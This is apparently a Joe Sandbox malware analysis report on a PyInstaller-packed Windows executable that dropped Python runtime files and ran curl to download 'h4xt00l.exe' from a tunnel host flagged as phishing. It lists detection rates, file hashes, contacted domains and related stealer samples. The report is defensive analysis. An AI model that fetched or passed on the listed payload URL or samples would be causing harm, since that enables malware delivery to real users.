Command and Control: 11 Encrypted Channel | 1 Ingress Tool Transfer | 2 Non-Application Layer Protocol | 3 Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction
Source | Detection | Scanner | Label
aLsxeH29P2.exe | 50% | Virustotal |
aLsxeH29P2.exe | 37% | ReversingLabs |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\_MEI73522\VCRUNTIME140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73522\_bz2.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73522\_decimal.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73522\_hashlib.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73522\_lzma.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73522\_socket.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73522\libcrypto-3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73522\python312.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73522\select.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73522\unicodedata.pyd | 0% | ReversingLabs |

No Antivirus matches

Source | Detection | Scanner | Label
eu.loclx.io | 1% | Virustotal |
haxerr.eu.loclx.io | 1% | Virustotal |

Source | Detection | Scanner | Label
https://haxerr.eu.loclx.io/h4xt00l.exe? | 100% | Avira URL Cloud | phishing
https://haxerr.eu.loclx.io/h4xt00l.exe | 100% | Avira URL Cloud | phishing
https://haxerr.eu.loclx.io/h4xt00l.exeQ | 100% | Avira URL Cloud | phishing
https://haxerr.eu.loclx.io/h4xt00l.exe--outputC: | 100% | Avira URL Cloud | phishing

Name | IP | Active | Malicious | Antivirus Detection | Reputation
eu.loclx.io | 167.99.38.229 | true | false | | unknown
haxerr.eu.loclx.io | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://haxerr.eu.loclx.io/h4xt00l.exe | false | Avira URL Cloud: phishing | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688 | aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E10000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://haxerr.eu.loclx.io/h4xt00l.exe? | curl.exe, 00000002.00000003.1744436719.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744492924.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744564320.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1744803181.000001AFC637C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
https://haxerr.eu.loclx.io/h4xt00l.exe--outputC: | curl.exe, 00000002.00000002.1744746751.000001AFC6349000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code | aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader | aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source | aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.1.dr | false | | high
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module | aLsxeH29P2.exe, 00000001.00000002.2974046958.0000019FB11F0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec | aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://docs.python.org/3/howto/mro.html. | aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr | false | | high
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package | aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches | aLsxeH29P2.exe, 00000001.00000002.2974046958.0000019FB11F0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data | aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module | aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E10000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy | aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.python.org/psf/license/ | aLsxeH29P2.exe, 00000001.00000002.2975354634.00007FFDFB768000.00000008.00000001.01000000.00000004.sdmp, python312.dll.0.dr | false | | high
https://www.openssl.org/H | libcrypto-3.dll.0.dr | false | | high
https://peps.python.org/pep-0205/ | aLsxeH29P2.exe, 00000001.00000002.2974046958.0000019FB11F0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr | false | | high
https://www.python.org/psf/license/) | aLsxeH29P2.exe, 00000001.00000002.2975033574.00007FFDFB5F2000.00000002.00000001.01000000.00000004.sdmp, python312.dll.0.dr | false | | high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py | aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://haxerr.eu.loclx.io/h4xt00l.exeQ | curl.exe, 00000002.00000003.1744436719.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744492924.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744564320.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1744803181.000001AFC637C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
https://peps.python.org/pep-0263/ | aLsxeH29P2.exe, 00000001.00000002.2975033574.00007FFDFB5F2000.00000002.00000001.01000000.00000004.sdmp, python312.dll.0.dr | false | | high
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename | aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E10000.00000004.00001000.00020000.00000000.sdmp | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
167.99.38.229 | eu.loclx.io | United States | 14061 | DIGITALOCEAN-ASNUS | false

IP
127.0.0.1

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1573003
Start date and time: 2024-12-11 11:29:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: aLsxeH29P2.exe
renamed because original name is a hash value
Original Sample Name: 8bd6a723809e23d1c14d7ff528e16e996a3b0b0432e2b7feb4eb5db52c542173(1).exe
Detection: MAL
Classification: mal60.winEXE@7/14@1/2
EGA Information:
  • Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed, report is missing behavior information
No simulations

Match | Associated Sample Name / URL | Detection | Threat Name | Context
167.99.38.229 | jgbC220X2U.exe | malicious | Unknown | pepwuecibr.eu.loclx.io/command

Match | Associated Sample Name / URL | Detection | Threat Name | Context
DIGITALOCEAN-ASNUS | jgbC220X2U.exe | malicious | Unknown | 167.99.38.229
DIGITALOCEAN-ASNUS | c9a6BV0eQO.exe | malicious | Unknown | 167.99.38.229
DIGITALOCEAN-ASNUS | https://hongkongliving.com | malicious | CAPTCHA Scam ClickFix | 159.89.194.120
DIGITALOCEAN-ASNUS | http://prntbl.concejomunicipaldechinu.gov.co | malicious | Unknown | 167.172.148.114
DIGITALOCEAN-ASNUS | Josho.arm.elf | malicious | Unknown | 157.230.180.175
DIGITALOCEAN-ASNUS | hax.arm.elf | malicious | Mirai | 45.55.195.236
DIGITALOCEAN-ASNUS | http://abercombie.com | malicious | Unknown | 104.248.224.96
DIGITALOCEAN-ASNUS | https://listafrica.org/Receipt.html | malicious | WinSearchAbuse | 68.183.112.81
DIGITALOCEAN-ASNUS | https://t.ly/8cSDx | malicious | Unknown | 188.166.17.21
DIGITALOCEAN-ASNUS | Forhandlingsfriheden.exe | malicious | FormBook, GuLoader | 165.22.38.185

Match | Associated Sample Name / URL | Detection | Threat Name | Context
74954a0c86284d0d6e1c4efefe92b521 | c9a6BV0eQO.exe | malicious | Unknown | 167.99.38.229
74954a0c86284d0d6e1c4efefe92b521 | dYUteuvmHn.exe | malicious | Unknown | 167.99.38.229
74954a0c86284d0d6e1c4efefe92b521 | new.ini.ps1 | malicious | Unknown | 167.99.38.229
74954a0c86284d0d6e1c4efefe92b521 | ALFq7XP17d.lnk | malicious | Unknown | 167.99.38.229
74954a0c86284d0d6e1c4efefe92b521 | kYGxoN4JVW.bat | malicious | Unknown | 167.99.38.229
74954a0c86284d0d6e1c4efefe92b521 | pn866G3CCj.lnk | malicious | Unknown | 167.99.38.229
74954a0c86284d0d6e1c4efefe92b521 | vZAhXkWkDT.lnk | malicious | Unknown | 167.99.38.229
74954a0c86284d0d6e1c4efefe92b521 | QsEn4Jw9pY.lnk | malicious | Unknown | 167.99.38.229
74954a0c86284d0d6e1c4efefe92b521 | ylNk78QlB8.lnk | malicious | Unknown | 167.99.38.229
74954a0c86284d0d6e1c4efefe92b521 | Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat | malicious | Unknown | 167.99.38.229
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| C:\Users\user\AppData\Local\Temp\_MEI73522\VCRUNTIME140.dll | c9a6BV0eQO.exe | Get hash | malicious | Unknown | Browse |  |
|  | https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exe | Get hash | malicious | Unknown | Browse |  |
|  | 0jNz7djbpp.exe | Get hash | malicious | Python Stealer | Browse |  |
|  | 7EznMik8Fw.exe | Get hash | malicious | Python Stealer | Browse |  |
|  | MkWMm5piE5.exe | Get hash | malicious | Python Stealer | Browse |  |
|  | okG6LaM2yP.exe | Get hash | malicious | Python Stealer | Browse |  |
|  | JxrkpYVdCp.exe | Get hash | malicious | Python Stealer, Babadeda | Browse |  |
|  | hSyJxPUUDx.exe | Get hash | malicious | Unknown | Browse |  |
|  | u08NgsGNym.exe | Get hash | malicious | Python Stealer | Browse |  |
|  | MkWMm5piE5.exe | Get hash | malicious | Python Stealer | Browse |  |
| C:\Users\user\AppData\Local\Temp\_MEI73522\_bz2.pyd | c9a6BV0eQO.exe | Get hash | malicious | Unknown | Browse |  |
|  | eEiHdLSfum.exe | Get hash | malicious | Unknown | Browse |  |
|  | eEiHdLSfum.exe | Get hash | malicious | Unknown | Browse |  |
|  | wallcarp.exe | Get hash | malicious | Unknown | Browse |  |
|  | lcc333.exe | Get hash | malicious | Unknown | Browse |  |
|  | lcc333.exe | Get hash | malicious | Unknown | Browse |  |
|  | dens.exe | Get hash | malicious | Python Stealer, Exela Stealer, Waltuhium Grabber | Browse |  |
|  | Runtime.exe | Get hash | malicious | Unknown | Browse |  |
|  | iu56HJ45NV.exe | Get hash | malicious | Unknown | Browse |  |
|  | General Agreement.docx.exe | Get hash | malicious | Python Stealer, Babadeda, Exela Stealer, Waltuhium Grabber | Browse |  |
                                                                                    Process:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):119192
                                                                                    Entropy (8bit):6.6016214745004635
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                    MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                    SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                    SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                    SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: c9a6BV0eQO.exe, Detection: malicious, Browse
                                                                                    • Filename: , Detection: malicious, Browse
                                                                                    • Filename: 0jNz7djbpp.exe, Detection: malicious, Browse
                                                                                    • Filename: 7EznMik8Fw.exe, Detection: malicious, Browse
                                                                                    • Filename: MkWMm5piE5.exe, Detection: malicious, Browse
                                                                                    • Filename: okG6LaM2yP.exe, Detection: malicious, Browse
                                                                                    • Filename: JxrkpYVdCp.exe, Detection: malicious, Browse
                                                                                    • Filename: hSyJxPUUDx.exe, Detection: malicious, Browse
                                                                                    • Filename: u08NgsGNym.exe, Detection: malicious, Browse
                                                                                    • Filename: MkWMm5piE5.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Process:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):85272
                                                                                    Entropy (8bit):6.591841805043941
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:Iyhz79151BVo1vXfzIFnaR4bO1As0n8qsjk+VIMCVl7SyVx7:/hzx15evXkuxAP8qMk+VIMCVlJ
                                                                                    MD5:30F396F8411274F15AC85B14B7B3CD3D
                                                                                    SHA1:D3921F39E193D89AA93C2677CBFB47BC1EDE949C
                                                                                    SHA-256:CB15D6CC7268D3A0BD17D9D9CEC330A7C1768B1C911553045C73BC6920DE987F
                                                                                    SHA-512:7D997EF18E2CBC5BCA20A4730129F69A6D19ABDDA0261B06AD28AD8A2BDDCDECB12E126DF9969539216F4F51467C0FE954E4776D842E7B373FE93A8246A5CA3F
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: c9a6BV0eQO.exe, Detection: malicious, Browse
                                                                                    • Filename: eEiHdLSfum.exe, Detection: malicious, Browse
                                                                                    • Filename: eEiHdLSfum.exe, Detection: malicious, Browse
                                                                                    • Filename: wallcarp.exe, Detection: malicious, Browse
                                                                                    • Filename: lcc333.exe, Detection: malicious, Browse
                                                                                    • Filename: lcc333.exe, Detection: malicious, Browse
                                                                                    • Filename: dens.exe, Detection: malicious, Browse
                                                                                    • Filename: Runtime.exe, Detection: malicious, Browse
                                                                                    • Filename: iu56HJ45NV.exe, Detection: malicious, Browse
                                                                                    • Filename: General Agreement.docx.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Process:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):257304
                                                                                    Entropy (8bit):6.565831509727426
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:/CxJS14bteS9B+ApcG0Qos0KR29py9qWM53pLW1AZHVHMhhhKoDStGwL0zsWD:/aeS9B+HQosbY9FfHVHXfEsWD
                                                                                    MD5:7AE94F5A66986CBC1A2B3C65A8D617F3
                                                                                    SHA1:28ABEFB1DF38514B9FFE562F82F8C77129CA3F7D
                                                                                    SHA-256:DA8BB3D54BBBA20D8FA6C2FD0A4389AEC80AB6BD490B0ABEF5BD65097CBC0DA4
                                                                                    SHA-512:FBB599270066C43B5D3A4E965FB2203B085686479AF157CD0BB0D29ED73248B6F6371C5158799F6D58B1F1199B82C01ABE418E609EA98C71C37BB40F3226D8C5
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Process:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):66328
                                                                                    Entropy (8bit):6.227186392528159
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:9PgLpgE4Z27jHZWZnEmoANIMOIi7SyAx2:9EtHZeEmoANIMOIit
                                                                                    MD5:A25BC2B21B555293554D7F611EAA75EA
                                                                                    SHA1:A0DFD4FCFAE5B94D4471357F60569B0C18B30C17
                                                                                    SHA-256:43ACECDC00DD5F9A19B48FF251106C63C975C732B9A2A7B91714642F76BE074D
                                                                                    SHA-512:B39767C2757C65500FC4F4289CB3825333D43CB659E3B95AF4347BD2A277A7F25D18359CEDBDDE9A020C7AB57B736548C739909867CE9DE1DBD3F638F4737DC5
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):160024
                                                                                    Entropy (8bit):6.85410280956396
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:ssvkxujgo7e2uONOG+hi+CTznfF9mNoDXnmbuVIMZ10L:snu0o7JUCNYOD2Kg
                                                                                    MD5:9E94FAC072A14CA9ED3F20292169E5B2
                                                                                    SHA1:1EEAC19715EA32A65641D82A380B9FA624E3CF0D
                                                                                    SHA-256:A46189C5BD0302029847FED934F481835CB8D06470EA3D6B97ADA7D325218A9F
                                                                                    SHA-512:B7B3D0F737DD3B88794F75A8A6614C6FB6B1A64398C6330A52A2680CAF7E558038470F6F3FC024CE691F6F51A852C05F7F431AC2687F4525683FF09132A0DECB
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):83736
                                                                                    Entropy (8bit):6.3186936632343205
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:mOYhekrkJqlerLSyypHf9/s+S+pzMii/n1IsJqKN5IMLwoR7SygCxkWN:vwkJqHyypHf9/sT+pzMiE1IwdN5IMLw0
                                                                                    MD5:69801D1A0809C52DB984602CA2653541
                                                                                    SHA1:0F6E77086F049A7C12880829DE051DCBE3D66764
                                                                                    SHA-256:67ACA001D36F2FCE6D88DBF46863F60C0B291395B6777C22B642198F98184BA3
                                                                                    SHA-512:5FCE77DD567C046FEB5A13BAF55FDD8112798818D852DFECC752DAC87680CE0B89EDFBFBDAB32404CF471B70453A33F33488D3104CD82F4E0B94290E83EAE7BB
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:dropped
                                                                                    Size (bytes):1332808
                                                                                    Entropy (8bit):5.586996633599356
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:rclJGUq/aLmn9vc+fYNXPh26UZWAzbX7jg/yquPxGhpdmFPpH71dAt/RO2/HU3:rclJGUza9zb/gXOOpdmFPNLAg2/HU3
                                                                                    MD5:FE165DF1DB950B64688A2E617B4ACA88
                                                                                    SHA1:71CAE64D1EDD9931EF75E8EF28E812E518B14DDE
                                                                                    SHA-256:071241AC0FD6E733147A71625DE5EAD3D7702E73F8D1CBEBF3D772CBDCE0BE35
                                                                                    SHA-512:E492A6278676EF944363149A503C7FADE9D229BDDCE7AFA919F5E72138F49557619B0BDBA68F523FFFE7FBCA2CCFD5E3269355FEBAF01F4830C1A4CC67D2E513
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):5232408
                                                                                    Entropy (8bit):5.940072183736028
                                                                                    Encrypted:false
                                                                                    SSDEEP:98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
                                                                                    MD5:123AD0908C76CCBA4789C084F7A6B8D0
                                                                                    SHA1:86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
                                                                                    SHA-256:4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
                                                                                    SHA-512:80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):6927640
                                                                                    Entropy (8bit):5.765552513907485
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:mRSn173WIgXqQYRn0I+gaYFD0iRpIrCMEGXgeieBwHTuJTA8LbLH7ft4OCLj8j4V:mIn8hYEgw8Ij887GlSvBHDMiEruuln
                                                                                    MD5:166CC2F997CBA5FC011820E6B46E8EA7
                                                                                    SHA1:D6179213AFEA084F02566EA190202C752286CA1F
                                                                                    SHA-256:C045B57348C21F5F810BAE60654AE39490846B487378E917595F1F95438F9546
                                                                                    SHA-512:49D9D4DF3D7EF5737E947A56E48505A2212E05FDBCD7B83D689639728639B7FD3BE39506D7CFCB7563576EBEE879FD305370FDB203909ED9B522B894DD87AACB
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):31000
                                                                                    Entropy (8bit):6.556986708902353
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:IyRVBC9t6Lhz64CHf2slDT90Y5IMQGCHQIYiSy1pCQFm/AM+o/8E9VF0Ny/r5n+/:LGyKHfx1H5IMQGY5YiSyv4AMxkEFNnq
                                                                                    MD5:7C14C7BC02E47D5C8158383CB7E14124
                                                                                    SHA1:5EE9E5968E7B5CE9E4C53A303DAC9FC8FAF98DF3
                                                                                    SHA-256:00BD8BB6DEC8C291EC14C8DDFB2209D85F96DB02C7A3C39903803384FF3A65E5
                                                                                    SHA-512:AF70CBDD882B923013CB47545633B1147CE45C547B8202D7555043CFA77C1DEEE8A51A2BC5F93DB4E3B9CBF7818F625CA8E3B367BFFC534E26D35F475351A77C
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):1138456
                                                                                    Entropy (8bit):5.4620027688967845
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:arEHdcM6hbuCjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcAIU:arEXDCjfk7bPNfv42BN6yzUAIU
                                                                                    MD5:A8ED52A66731E78B89D3C6C6889C485D
                                                                                    SHA1:781E5275695ACE4A5C3AD4F2874B5E375B521638
                                                                                    SHA-256:BF669344D1B1C607D10304BE47D2A2FB572E043109181E2C5C1038485AF0C3D7
                                                                                    SHA-512:1C131911F120A4287EBF596C52DE047309E3BE6D99BC18555BD309A27E057CC895A018376AA134DF1DC13569F47C97C1A6E8872ACEDFA06930BBF2B175AF9017
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\System32\curl.exe
                                                                                    File Type:HTML document, ASCII text
                                                                                    Category:modified
                                                                                    Size (bytes):2036
                                                                                    Entropy (8bit):5.210145672839598
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:VDVfYW0P5CwwXzK+oMmlml/DKA0Xt1amo8QfZ8SESGb3/:DGxFAzK+oMCWDKA0X2DfHBWv
                                                                                    MD5:B6F717CDD4DE329F1C7FA66E362600FF
                                                                                    SHA1:A98FAE273452DC5398F2E5B454996364F78AE914
                                                                                    SHA-256:27230504D1F8FCD449E0306B169866BC894214894576A9F7535B7E4246703C30
                                                                                    SHA-512:8317C324CD24375EC6DB06356CD9E952D592F693A969498CB92C07211E08CFC7C8E02900780E1C6DEA6EB4007E1F671D26696D2442E032E91D738C9457ECC9B5
                                                                                    Malicious:false
                                                                                    Preview:<!DOCTYPE html>.<html lang="en">.<head>..<meta charset="utf-8">..<meta http-equiv="X-UA-Compatible" content="IE=edge">..<meta name="viewport" content="width=device-width, initial-scale=1">..<title>404 TUNNEL NOT FOUND</title>..<link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet">..</head>..<style>.* {. -webkit-box-sizing: border-box;. box-sizing: border-box;.}.body {. padding: 0;. margin: 0;.}.#error {. position: relative;. height: 100vh;. background-image: linear-gradient(#0b1326 50%, #0e1931 90%);.}.#error .error {. position: absolute;. left: 50%;. top: 50%;. -webkit-transform: translate(-50%, -50%);. -ms-transform: translate(-50%, -50%);. transform: translate(-50%, -50%);.}..error {. max-width: 767px;. width: 100%;. line-height: 1.4;. text-align: center;.}..error .error-msg {. position: relative;.. margin-bottom: 20px;. z-index: -1;.}..error .error-msg h1 {. font-family: 'Nunito', sans-serif;. position: absolu
                                                                                    Process:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                    Category:dropped
                                                                                    Size (bytes):1835008
                                                                                    Entropy (8bit):4.462947280327378
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:NIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:eXD94+WlLZMM6YFHg+n
                                                                                    MD5:DAE37CC20027B9FFF6B48E850F4CC7E9
                                                                                    SHA1:7E9A3A1EA13C174947CF6A9EA86645B468C6EEFA
                                                                                    SHA-256:C7CCFA6847121CB7FB9D3408F24E9721A83AB28FB3C5474FF78B126DCDBEFC4A
                                                                                    SHA-512:46C0D7B374FEE1C5C435B823113B642432109DE5FA3D8B004151B1E6538E6482E7DA65EC264AC18F037DBED9BA11B2B41B25DAD8FA315DB82D2C6FEBC82E9150
                                                                                    Malicious:false
                                                                                    Process:C:\Windows\System32\curl.exe
                                                                                    File Type:ASCII text, with CR, LF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):478
                                                                                    Entropy (8bit):3.097721489649575
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdivId6Fjai4U0FcKi6on:Vz6ykymUexb1U9cdd6x0qV
                                                                                    MD5:D8EAC298524FCA2B30D1329F1B238C21
                                                                                    SHA1:4B1328811D338821F597160F796A503EFEB97F72
                                                                                    SHA-256:F12C6DA114F3CA2643EDDA03299FEC6F8A506B2154D4848B01F5B0E54EA15A6F
                                                                                    SHA-512:E6F82CF548EC3DCB1C40C22564A5CEA363D7E14B1BBA68445C2C47300EFC87552074AF0928EB8F0418443B495BF9DFEE2E2CDB2E6EF4E281533F8E9E63FA132C
                                                                                    Malicious:false
